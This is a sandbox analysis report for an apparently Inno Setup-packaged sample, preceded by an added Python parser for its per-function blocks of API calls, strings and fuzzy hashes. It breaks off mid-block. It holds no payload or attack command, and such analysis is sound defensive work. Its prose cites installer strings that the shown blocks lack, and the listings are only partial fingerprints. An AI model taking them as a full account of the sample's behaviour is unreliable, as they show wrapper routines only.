• Instruction ID: 8551b8634482954e3fd0c2332de757f57d69561d22e1e83ac04cf94fc86de4b6
• Opcode Fuzzy Hash: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
• Instruction Fuzzy Hash: 29411074A001099BDB04EFA5D886ADEB7B7EF89304F50417AF400B7392DE74AE05CB69
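Added example, not Joe Sandbox code: a parser for the per-function blocks of this report. Each block has an APIs section (the function's own calls plus "Part of subcall function" entries, each with module, argument list and ref address), a Strings section with xrefs that may be empty, the Memory Dump Source (whose Associated lines carry "Download File" link residue from the HTML export, which the parser strips), the IDA plugin snapshot name, and the Similarity fields (API ID, String ID, Opcode ID, Instruction Fuzzy Hash). The line grammar is inferred from the blocks above, and SAMPLE is a constructed excerpt of two of them. The two helpers build the MODULE!Api profile of a function's direct calls and find the blocks that carry a given string. The strings in the blocks above ("_isetup", "\_setup64.tmp", "_iu" with ".tmp", "Cannot evaluate variable because [Code] isn't running yet") are Inno Setup installer runtime strings, so the blocks carrying them describe the installer wrapper rather than payload-specific code; the Opcode ID and Instruction Fuzzy Hash fields are the per-function fingerprints the parser keeps for comparison across reports.

```python
"""Parse the per-function blocks of a Joe Sandbox report into records.

Added example, not Joe Sandbox code. The line grammar is inferred from the
blocks on this page; SAMPLE is a constructed excerpt of two of them.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = "\u2022"
LINK_RESIDUE = "Download File"  # HTML export glues the link label onto .sdmp names

# "[Part of subcall function ADDR: ]Api.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)        # {"api","module","args","ref","subcall"}
    strings: list = field(default_factory=list)     # {"text","xref"}
    meta: dict = field(default_factory=dict)        # "API ID", "Opcode ID", "Instruction Fuzzy Hash", ...
    associated: list = field(default_factory=list)  # associated .sdmp names, residue stripped


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip(BULLET).strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":            # every block opens with its APIs section
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None:                   # text before the first block
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:                         # lines of unknown shape are skipped, not guessed
                args = m.group("args")
                cur.apis.append({"api": m.group("api"), "module": m.group("mod"),
                                 "args": args.split(",") if args else [],
                                 "ref": m.group("ref"), "subcall": m.group("sub")})
        elif section == "Strings":
            s, sep, xref = line.rpartition(", xrefs: ")
            cur.strings.append({"text": s if sep else line, "xref": xref if sep else None})
        else:                             # "Key: value" lines of the remaining sections
            key, _, value = line.partition(":")
            key, value = key.strip(), value.strip()
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)].strip()
            if key == "Associated":
                cur.associated.append(value)
            else:
                cur.meta[key] = value
    return blocks


def direct_api_profile(blocks: list[FunctionBlock]) -> set[str]:
    """'MODULE!Api' for calls the function makes itself. Subcall entries are
    excluded: they belong to callees and would be double-counted across blocks."""
    return {f"{a['module']}!{a['api']}" for b in blocks for a in b.apis if a["subcall"] is None}


def blocks_with_string(blocks: list[FunctionBlock], needle: str) -> list[FunctionBlock]:
    """Blocks whose Strings section or Similarity 'String ID' contains needle."""
    return [b for b in blocks
            if any(needle in s["text"] for s in b.strings)
            or needle in b.meta.get("String ID", "")]


# Constructed excerpt of two blocks from this report, residue included.
SAMPLE = """\
APIs
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600BE9
• SetForegroundWindow.USER32(?), ref: 00600C21
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 00600D5B
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundProc
• String ID: Cannot evaluate variable because [Code] isn't running yet
• Instruction Fuzzy Hash: 65911134644204AFE719DF58CD61F9ABBBAEB89700F1584AAF804AB3E1C675AD40CF14
APIs
  • Part of subcall function 005A3A28: GetCursorPos.USER32 ref: 005A3A2F
• SetTimer.USER32 ref: 005A3B9F
• WaitMessage.USER32(00000000,005A3C1D,?,?,?,00000000), ref: 005A3BFD
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CurrentCursorMessageThreadTimerWait
• String ID:
"""
```

Running parse_blocks over the whole saved report text instead of SAMPLE gives one record per function; direct_api_profile over those records is the capability summary of the dumped module, and filtering out blocks_with_string(blocks, "_isetup") and the other installer strings leaves the functions worth comparing by Opcode ID or Instruction Fuzzy Hash against other reports.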
                                                                                    APIs
                                                                                      • Part of subcall function 0040EC94: GetModuleHandleW.KERNEL32(00000000,?,0065C4B7), ref: 0040ECA0
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0065C4C7
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0065C4E3
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0065C528), ref: 0065C4F8
                                                                                      • Part of subcall function 00651170: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 005A2F2C: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005A2F51
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,0065C528), ref: 0065C562
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup
                                                                                    • API String ID: 1533765661-3839654196
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000004FF,00000000,00619B3D), ref: 00619AEE
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00619B11
                                                                                    • CloseHandle.KERNEL32(?,00619B44,000000FF,000004FF,00000000,00619B3D), ref: 00619B37
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 0040566B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405671
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 00405680
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405691
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FE4
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32 ref: 005A0B1A
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005A0B46
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A0B4B
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF,00000000), ref: 005A0B74
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005A0B81
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0046E670,00000004,0046E66C,00000000,004703CD,?,0046E66C,00000000), ref: 0047036F
                                                                                      • Part of subcall function 004085D8: CreateThread.KERNEL32 ref: 00408632
                                                                                    • GetCurrentThread.KERNEL32 ref: 004703A7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004703AF
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 9D
                                                                                    • API String ID: 3539746228-2600770735
                                                                                    • Opcode ID: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction ID: f9857796ad14231e6e04606ef7c0ce10faa70948f457118b7ae5954610b77c36
                                                                                    • Opcode Fuzzy Hash: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction Fuzzy Hash: 9B31E070A05744EFD720DB76C8417EBBBE4AF09304F40C87EE899D7691DA78A844C769
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C,?,00000000), ref: 00650944
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C), ref: 0065096D
                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000), ref: 00650986
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-3657609586
                                                                                    • Opcode ID: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction ID: fd64645e21a18fecabc0b8dc279039ee35b9e16079179385e1984e8b922befa7
                                                                                    • Opcode Fuzzy Hash: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction Fuzzy Hash: 8131C571E002099FEB00EBA9C9829DEB7F9AF44314F50457EF814F32D2CB389E458A55
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00407AEA
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00007A80), ref: 00407B27
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@
                                                                                    • API String ID: 3192549508-2535443016
                                                                                    • Opcode ID: 4b9580ef83ab60be5e1144ed772b18e1cf81e1b814eace585b2863a8bb85044a
                                                                                    • Instruction ID: b43bc4563ed2c5b4d44d4e312f14e91904ee98f66dbd2fd5bccfcfafe145c76a
                                                                                    • Opcode Fuzzy Hash: 4b9580ef83ab60be5e1144ed772b18e1cf81e1b814eace585b2863a8bb85044a
                                                                                    • Instruction Fuzzy Hash: B53141B0A08340AFE720EB15C985F27B7F9EB84718F1585AEE504972D1C778FC85C666
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: fe6d2a0f9b9a2abee4062f10a0be2c3e91457e6813b961ba9c6a74811b2b6cc5
                                                                                    • Instruction ID: 81debfe1353670a627177ee0635cc1a720af15295a81fe09638863fdd9ccb86d
                                                                                    • Opcode Fuzzy Hash: fe6d2a0f9b9a2abee4062f10a0be2c3e91457e6813b961ba9c6a74811b2b6cc5
                                                                                    • Instruction Fuzzy Hash: DE2162717082069BD724DF29C980B2B77A1AB84704F15853EE444AB3D5CB3CED459B6A
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 0064E3CD
                                                                                    • CloseHandle.KERNEL32(xd,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000), ref: 0064E3EA
                                                                                      • Part of subcall function 0064E2B8: GetLastError.KERNEL32(00000000,0064E353,?,?,?), ref: 0064E2DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D$xd
                                                                                    • API String ID: 3798668922-589168589
                                                                                    • Opcode ID: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction ID: 2770b63dbd5f0664191502d66b5aa67e7b61ccad1497a3da23e2b2c891076db0
                                                                                    • Opcode Fuzzy Hash: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction Fuzzy Hash: 4111A171644608AFEB00DBD5CC82EDE77EDEF09704F51407AF604E7291E6799D008A69
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000B06,00000000,00000000), ref: 0060066E
                                                                                    • SendMessageW.USER32(?,00000B00,00000000,00000000), ref: 0060070B
                                                                                    Strings
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0060069A
                                                                                    • Failed to create DebugClientWnd, xrefs: 006006D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction ID: 4175b821cf142c8e622798afdf7fde6d0c746e5252e1edb01a77202dd48d2af0
                                                                                    • Opcode Fuzzy Hash: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction Fuzzy Hash: 7E1123B06843409FF310EB68DC81B9B7FD99B85708F180429F5849B3D2D7B66C50CBA6
                                                                                    APIs
                                                                                      • Part of subcall function 005AF910: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,0066978C,00000000,005F8F3B,00000000,005F9216,?,?,0066978C), ref: 005AF941
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00619667
                                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00619683
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 4170313675-2435364021
                                                                                    • Opcode ID: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction ID: a1c6d1944a89705a1ae2f70c12028eadbe445236a7dfe10c2b454775ce8fdd12
                                                                                    • Opcode Fuzzy Hash: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction Fuzzy Hash: FA014470704209AFEB10FBA5CD92BDE77EDEB48704F504475B500F3292EA78AE458678
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 005F9138
                                                                                      • Part of subcall function 00420F94: DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                      • Part of subcall function 00420F94: GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                      • Part of subcall function 00420F94: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                      • Part of subcall function 00420F94: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • MoveFileW.KERNEL32 ref: 005F9165
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                    • String ID: DeleteFile$MoveFile
                                                                                    • API String ID: 3947864702-139070271
                                                                                    • Opcode ID: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction ID: b8499831526bb04dbf5f9ac4b51478e099ff73939971a2d4390da8e0a4ff792a
                                                                                    • Opcode Fuzzy Hash: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction Fuzzy Hash: CAF0497565850A9AEB00FB65D946BBE7BD4FB94304F60443BF504E32C6D93C9C01C629
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 004649AE
                                                                                      • Part of subcall function 00420CF0: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,0043F138,004649F0,00000000,00464A70,?,?,0043F138), ref: 00420D3F
                                                                                      • Part of subcall function 00421144: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,0043F138,00464A0B,00000000,00464A70,?,?,0043F138,00000001), ref: 00421167
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 00464A15
                                                                                      • Part of subcall function 004251D8: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 004251FC
                                                                                      • Part of subcall function 004251D8: LocalFree.KERNEL32(00000001,00425255,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 00425248
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                    • String ID: 4Dd$d{C
                                                                                    • API String ID: 503893064-2058038346
                                                                                    • Opcode ID: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction ID: 0683953512549e244d6d4d668f9f4a6bb5012169835e8b5d33232cac3ad6031b
                                                                                    • Opcode Fuzzy Hash: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction Fuzzy Hash: 3F41F670E002099FCB10EFB5C8815EEB7F1AF49314F90817AE904A7382DB785E01CB6A
                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040C051
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040C0AF
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040C10C
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040C13F
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040C0BD), ref: 0040C013
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040C0BD), ref: 0040C030
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction ID: e50dbe343586da412169edcbcf2f18ed2f71acdc650f4f92d90da3ef9dabf820
                                                                                    • Opcode Fuzzy Hash: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction Fuzzy Hash: 11311C70A0021EDBDB10DFE9C885AAEB3B5EF04315F00427AE551E7291DB789A44CB99
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32 ref: 004733C5
                                                                                    • UnregisterClassW.USER32(00473388,00400000), ref: 004733EE
                                                                                    • RegisterClassW.USER32 ref: 004733F8
                                                                                    • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 00473443
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction ID: a8c172639951b3e6cb5da7468db87f3e5ba31e7f9e45713803e63bcfa106701e
                                                                                    • Opcode Fuzzy Hash: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction Fuzzy Hash: 100188717001046BCB10FF68ED81FDB739AE718306F109226F908E73A1DABADD558759
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32 ref: 005A3D8F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005A3DD1
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A3DEB
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005A3EA5,?,?,?,00000000), ref: 005A3E13
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Visible
                                                                                    • String ID:
                                                                                    • API String ID: 2967648141-0
                                                                                    • Opcode ID: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction ID: a7e9761be64e8251a726e41e5ea799dd36543e273c62785c0243dde29f2c5ab3
                                                                                    • Opcode Fuzzy Hash: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction Fuzzy Hash: 50115670205144AFDB10EB29D889FA97FD9BB45356F448595F844CF361C774EE80C790
                                                                                    APIs
                                                                                    • FindResourceW.KERNEL32(00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?,?,00644460), ref: 00465253
                                                                                    • LoadResource.KERNEL32(00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000,?,0066978C,?), ref: 0046526D
                                                                                    • SizeofResource.KERNEL32(00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000,00000000), ref: 00465287
                                                                                    • LockResource.KERNEL32(00464B24,00000000,00400000,004652D8,00400000,004652D8,00400000,?,?,0043FE3C,00400000,00000001,00000000,?,0046517E,00000000), ref: 00465291
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction ID: cc44b1e40f387fa113896bb731206f382d166b60eb9947859bc6d233c5ebbc2f
                                                                                    • Opcode Fuzzy Hash: 0f0122636f5e1f829796b1b782f7f01f5b08c6add20a43d762356a9fcebc62f1
                                                                                    • Instruction Fuzzy Hash: 32F0D1B36046046F5744EE9DA881D9B77ECEE89368310015FF908C7206EA38DE118779
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F9151
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,00000000,00000000,00000000,00000000), ref: 004F915A
